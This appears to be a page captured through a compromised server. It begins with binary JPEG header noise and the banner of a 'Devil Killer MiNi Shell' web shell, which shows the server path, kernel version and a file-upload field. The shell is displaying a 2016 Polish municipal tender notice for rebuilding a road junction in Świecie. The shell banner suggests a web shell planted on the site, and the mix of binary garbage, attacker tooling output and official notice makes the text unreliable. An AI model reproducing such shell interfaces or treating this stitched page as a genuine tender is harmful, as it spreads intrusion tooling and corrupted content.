JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160217/35470-N-2016.html

<p class="kh_header"><b>Świecie: Rozbudowa skrzyżowania ulic: Sienkiewicza, Kościuszki i Słowackiego w Świeciu wraz z przebudową kolidującej infrastruktury</b><br>
<b>Numer ogłoszenia: 35470 - 2016; data zamieszczenia: 17.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świecie , ul. Wojska Polskiego 124, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 333 23 10, faks 52 333 23 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiecie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa skrzyżowania ulic: Sienkiewicza, Kościuszki i Słowackiego w Świeciu wraz z przebudową kolidującej infrastruktury.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Rozbudowa skrzyżowania ulic: Sienkiewicza, Kościuszki i Słowackiego w Świeciu wraz z przebudową kolidującej infrastruktury obejmująca wykonanie robót - na odcinkach ulic o długości: ul. Sienkiewicza - około 280m, ul. Słowackiego - około 120m, ul. Kościuszki - około 190m
1.1 Roboty drogowe w zakresie:
-	robót przygotowawczych w tym: pomiarowych, usuniecie drzew i krzewów, zdjęcie warstwy ziemi urodzajnej (humusu), rozbiórka elementów dróg i ogrodzeń w tym: rozebranie betonowych: krawężników, oporników i obrzeży o łącznej długości - 2706m, nawierzchni z kostki betonowej i podbudowy: chodników, zjazdów i nawierzchni dla robót sieciowych o łącznej powierzchni 4217,80m2, nawierzchni z mieszanek mineralno - bitumicznych i podbudowy łącznie - 4578,80m2, balustrady ochronnej, oznakowania pionowego, istniejącego ogrodzenia wraz z podmurówką, brama i furtką;
-	wykonania robót ziemnych w tym: wykopów i nasypów;
-	mechaniczne wykonanie koryta pod konstrukcję chodników, ul. Sienkiewicza, Kościuszki, Słowackiego, ronda, pierścienia ronda, zabruki, wyspy dzielące, zatoki przystankowe, zjazdy, miejsca postojowe, odtworzenie nawierzchni i wyniesione przejścia wraz z mechanicznym profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni i wykonaniem warstwy odsączającej z piasku na łącznej powierzchni - 9059,70m2
-	podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm grub. 15cm, 16 cm i 20 cm, wykonanie warstwy z gruntu stabilizowanego cementem o Rm=2,5 Mpa, grub. 15 cm; podbudowa z chudego betonu gr 20 cm, podbudowa z betonu C12/15 grub. 16 cm i 20 cm i C16/20 gr 20 cm, podbudowa zasadnicza z betonu asfaltowego AC22P - warstwa o grub. 8 cm;
-	oczyszczanie i skropienie warstw konstrukcyjnych emulsja asfaltową;
-	nawierzchnie z mieszanek mineralno - bitumicznych asfaltowych - warstwa wiążąca - AC16 o grub. 6 cm warstwa ścieralna - SMA 11 o grub. 4 cm
-	nawierzchnia z kostki kamiennej 9/11 - pod wyspy dzielące, opaska na wyspie ronda, zabruk pomiędzy rondem a chodnikiem;
-	Oznakowanie poziome grubowarstwowe i pionowe; urządzenia bezpieczeństwa ruchu;
-	Elementy ulic: krawężniki betonowe o wym. 15x30 cm, 15x22 cm i oporniki o wym. 12x25 cm na podsypce cem-piaskowej i ławie betonowej C12/15 z oporem krawężniki kamienne o wym. 15x30 cm, 15x21 na podsypce cementowo - piaskowej i na ławie betonowej C12/15 z oporem i oporniki kamienne o wym 12x25 cm i  ławie betonowej C8/10 z oporem, obrzeża betonowe chodnikowe 8x30 na podsypce cem - piaskowej i ławie betonowej C8/10 z oporem;
-	Ułożenie rur osłonowych dwudzielnych grubościennych i ochronnych dla przewodów telekomunikacyjnych i elektrycznych;
-	Montaż wiaty przystankowej, ogrodzenia trwałego na podmurówce wraz z bramą wjazdową dwuskrzydłowa i furtkami;
1.2. Budowa kanalizacji deszczowej z rur PVC - U litych klasy S, SNB o średnicach Dz 200mm (przykanaliki), Dz 250mm, Dz 315mm i Dz 400 mm z uszczelkami trwale mocowanymi w kielichu rury o długości łącznej 744,50 z uzbrojeniem kanału poprzez wykonanie studni rewizyjnych z elementów betonowych i żelbetowych kompletne z włazem samopoziomującym i studzienek ściekowych kompletnych z osadnikiem z elementów betonowych oraz separatory zintegrowane z osadnikiem z nadbudową; regulacja pionowa włazów kanałowych; demontaż i montaż konstrukcji podwieszeń kabli energetycznych i telekomunikacyjnych oraz podwieszeń rurociągów i kanałów;
1.3. Przebudowa sieci kanalizacji sanitarnej (ogólnospławnej) w zakresie: renowacji istniejących kanałów bezwykopowo - metodą cementowania poprzez natryskiwanie metodą odśrodkową zaprawy cementowej na wewnętrzne ścianki rur lub przy pomocy technologii rękawa utwardzonego promieniami UV lub termicznie tzn. tkaniny technicznie nasączonej fabrycznie żywicami oraz zaprawami wodoszczelnymi odpornymi na korozję - w ul. Sienkiewicza - kanał DN 300 i DN500, w ul. Słowackiego - DN 300 i w ul. Kościuszki -DN 350 i DN 450 o łącznej długości 793m oraz wykonania renowacji istniejących studni kanalizacyjnych rewizyjnych na odcinkach sieci kanalizacyjnej poddanych renowacji wraz z zabezpieczeniami antykorozyjnymi elementów studzienek; zaślepienie istniejących przykanalików deszczowych, likwidacja istniejących wpustów i kanałów, inspekcja TV oraz regulacja pionowa istniejących studni kanalizacyjnych;

1.4. Rozbiórka i budowa nowego przepustu na cieku Struchawa (branża mostowa) obejmuje rozbiórkę istniejącego i budowę nowego przepustu o konstrukcji żelbetowej i przekroju prostokątnym w zakresie: robót przygotowawczych w tym: przekierowanie cieku wodnego - montaż i demontaż tymczasowych kanałów rurowych, przepompowanie, pompowanie wody z wykopu, wbijanie i wyciąganie ścianek szczelnych z grodzic stalowych, robót pomiarowych przy liniowych robotach ziemnych; robót rozbiórkowych w tym: rozebranie poręczy ochronnych, rurowych, demontaż kraty, rozebranie przepustów rurowych - rur betonowych o średnicy 75cm - 169,6 m, wykucie otworów w ściance wlotowej, rozebranie ścianek czołowych przepustu z kamienia łamanego - 8,17m3 i materacy siatkowo - kamiennych; robót ziemnych: wykonanie wykopów z odwozem gruntu - 606,74 m3, zasypanie wykopów gruntem z dowozu - 692,90m3, wzmocnienie nasypu - zasypki geosiatką pod nawierzchnię drogową - 396,27m2; budowa przepustu z prefabrykatów żelbetowych skrzynkowych - 85,85m zakończonego ścianami czołowymi żelbetowymi, wykonanie izolacji, montaż balustrady, umocnienie dna koryta wylotu oraz podnóży skarp materacami gabionowymi na warstwie chudego betonu;

1.5. Przebudowa sieci wodociągowej w zakresie: roboty ziemne, montaż rurociągów z rur ciśnieniowych: PE100 SDR11 o średnicy Dz 225mm i z rur PE100 SDR11 TS o średnicy Dz 225mm o łącznej długości 468,30m wraz z przyłączami z rur ciśnieniowych PE100 SDR11 o średnicy Dz 25mm, Dz 32mm, Dz 50mm, Dz 90mm, ułożonych na podsypce piaskowej grub. 20 cm z obsypką rurociągu warstwą piasku grub 20 cm; ustawienie zasuw żeliwnych z obudową i skrzynką uliczną do zasuw o średnicy: 80 mm, 100mm, 150mm, 200mm: ustawienie hydrantów pożarowych podziemnych i naziemnych o śr. DN80; próby szczelności, płukanie dezynfekcja rurociągu;

1.6. Przebudowa sieci gazowej niskiego ciśnienia w zakresie: roboty ziemne, montaż rurociągów z rur jednowarstwowych (litych) PE HD klasy PE 100 SDR17 RC o średnicy Dz 125mm i Dz 160 mm oraz Dz 63mm (przepięcie istniejącego przyłącza) o łącznej długości 103,80m; zastosowanie rur ochronnych z PE100 SDR17 o śr. 250mm i 315mm wyposażone w płozy z tworzywa sztucznego; regulacja pionowa skrzynek zasuw i likwidacja gazociągu długości 110m;

1.7. Przebudowa linii elektroenergetycznej SNi NN - w zakresie budowy linii kablowej SN - 15kV obejmującej ułożenie kabla XHAKXS 12/20kV 1 x120/50 mm2 w rowie i przepustach kablowych o łącznej długości 528m z zastosowaniem rur ochronnych DVK i SRS 160; w zakresie budowy linii kablowej NN- 0,4kV - obw. 700 Świecie - Sienkiewicza obejmującej, ułożenie kabla YAKXS 4x120mm2 w rowie i przepustach kablowych o łącznej długości 119m z zastosowaniem rur osłonowych DVK i SRS 110 oraz montażem szafki kablowej SK-3; - obw. 800 Świecie - Kościuszki, obejmującej ułożenie kabla YAKXS 4x120mm2 na żerdzi typu E, w rowie i przepustach kablowych o łącznej długości 90m z zastosowaniem rur osłonowych DVK i SRS 110 oraz montażem szafki kablowej SK - 4; obw. 200 Świecie Dom Kultury, obejmującej ułożenie kabla YAKXS 4x120mm2 w rowie i przepustach kablowych o łącznej długości 117m z zastosowaniem rur ochronnych DVK i SRS 110 oraz montażem szafki kablowej SK-3;

1.8.Demontaż sieci elektroenergetycznej SN, NN i oświetleniowej obejmuje: demontaż odcinków istniejących linii kablowych SN 15kV YHAKXS 12/20kV 1 x 120mm2 - 360m; demontaż istniejącej linii napowietrznej nn- 600m i 156m wraz z słupami żelbetowymi oraz przyłączami do budynków; demontaż sieci oświetleniowej chodników oraz ulic w tym kabli oświetleniowych - 457m, słupów oświetleniowych drogowych i parkowych - 14 szt., przewodów linii nn o łącznej  długości - 311m i opraw oświetleniowych;

1.9. Przyłącza kablowe NN 0,4 kV do budynków w zakresie:  układanie kabla YKXS 4x16mm2 i kabla YKXS 4x10mm2 w rowach, w rurach ochronnych w ziemi, w fundamencie, złączach, skrzyniach, na budynkach nad i pod tynkiem o łącznej długości 269m.

1.10. Budowa oświetlenia drogowego obejmuje: budowę linii kablowej oświetleniowej 0,4 kV - ułożenie kabla YKXS 5x10mm2 w rowach i przepustach kablowych o łącznej długości 918m wraz szafką sterowania oświetleniem ROU-2 OR-1 oraz budowę 19 słupów oświetlenia ulicznego SAL - 9 z oprawami LED 72W oraz 2-ch słupów oświetlenia parkowego SAL-4 z oprawami LED 36W opartych na fundamentach prefabrykowanych;

1.11. Przebudowa sieci teletechnicznej NETIA S.A. obejmuje: budowę kanalizacji kablowej z rur PP  110/5 i HDPE 110/6,3 z zastosowaniem studni kablowej o gabarycie SKR - 2; budowę telekomunikacyjnego rurociągu kablowego z rur RHDPE fi 40, demontaż telekomunikacyjnej kanalizacji kablowej pierwotnej i rurociągu kablowego, budowa kabla rozdzielczego, kanalizacji wtórnej z rur 2xRHDPE 32, budowa i demontaż kabla optotelekomunikacyjnego;

1.12. Przebudowa sieci teletechnicznej ORANGE POLSKA S.A obejmuje: budowę kanalizacji kablowej z rur PP 110/5 i HDPE 110/6,3, budowę kabli z żyłami miedzianymi, budowę kanalizacji wtórnej, przebudowę kabli optotelekomunikacyjnych, budowę szafy kablowej, demontaż kanalizacji kablowej i szafy kablowej;

1.13. Przebudowa przyłączy telekomunikacyjnych ORANGE POLSKA S.A. obejmuje: budowę w postaci telekomunikacyjnych kabli ziemnych szerokopasmowych typu XzTKMDXpw 2x2x0,5 o łącznej długości 308m z zastosowaniem rur HDPE 110/6,3mm

W ramach realizacji zadania Wykonawca zobowiązany jest również do:
- zapewnienia znaków niezbędnych do wprowadzenia oznakowania tymczasowej organizacji ruchu na czas prowadzenia robót zgodnie z zatwierdzonym projektem wraz z ustawieniem,
- wykonania prac geodezyjnych i wykonania geodezyjnej inwentarycji powykonawczej wszystkich branż..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.40-8, 45.23.13.00-8, 45.24.00.00-1, 45.23.12.20-3, 45.23.14.00-9, 45.23.23.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże roboty budowlane prawidłowo wykonane (ukończone) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
-	jedną robotę budowlaną w technologii porównywalnej tj. obejmującej budowę, rozbudowę, przebudowę i remont drogi wraz z infrastrukturą techniczną, o nawierzchni z mieszanek mineralno - bitumicznych, o długości co najmniej 650m 
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają załączyć Wykonawcy - wyszczególnionych w § 7 specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi Wykonawcy w celu realizacji zamówienia, w tym co najmniej:
- walcem stalowym z wibracją.,
-	 walcem ogumionym lub stalowo - gumowym,
-	 rozściełaczem (rozkładarką) z pełna elektroniką
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają załączyć Wykonawcy - wyszczególnionych w § 7 specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia, co najmniej:
-	kierownik budowy - posiadający uprawnienia budowlane do kierowania robotami budowlanymi zgodnie z przepisami Prawa Budowlanego, w specjalności drogowej bez ograniczeń i 3 - letnie doświadczenie zawodowe (okres od dnia uzyskania uprawnień) - wykazanie kierowania robotami drogowymi jako kierownik budowy. 
-	kierownicy robót posiadający uprawnienia budowlane do kierownika robotami budowlanymi w specjalnościach: sanitarnej, sieci elektroenergetycznych, telekomunikacyjnych i gazowych.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają załączyć Wykonawcy - wyszczególnionych w § 7 specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże posiadanie opłaconej polisy, a w przypadku jej braku        innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony                    od odpowiedzialności cywilnej w zakresie prowadzonej działalności             związanej z przedmiotem zamówienia na wartość nie mniejszą niż równowartość 4.000.000,00 PLN.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają załączyć Wykonawcy - wyszczególnionych w § 7 specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz oferty (lub zgodny z załączonym wzorem) - Załącznik nr 1, wraz z zestawieniem wartości robót - Załącznik nr 1a
       / Wymagana forma dokumentu - oryginał/

2.	Kosztorysy ofertowe sporządzone na podstawie przedmiarów robót - Załącznik nr 2 
       / Wymagana forma dokumentu - oryginał/
3.	Harmonogram rzeczowo - finansowy realizacji zamówienia
4.	Dokument potwierdzający wniesienie wadium (forma zgodna z § 9 niniejszej SIWZ);

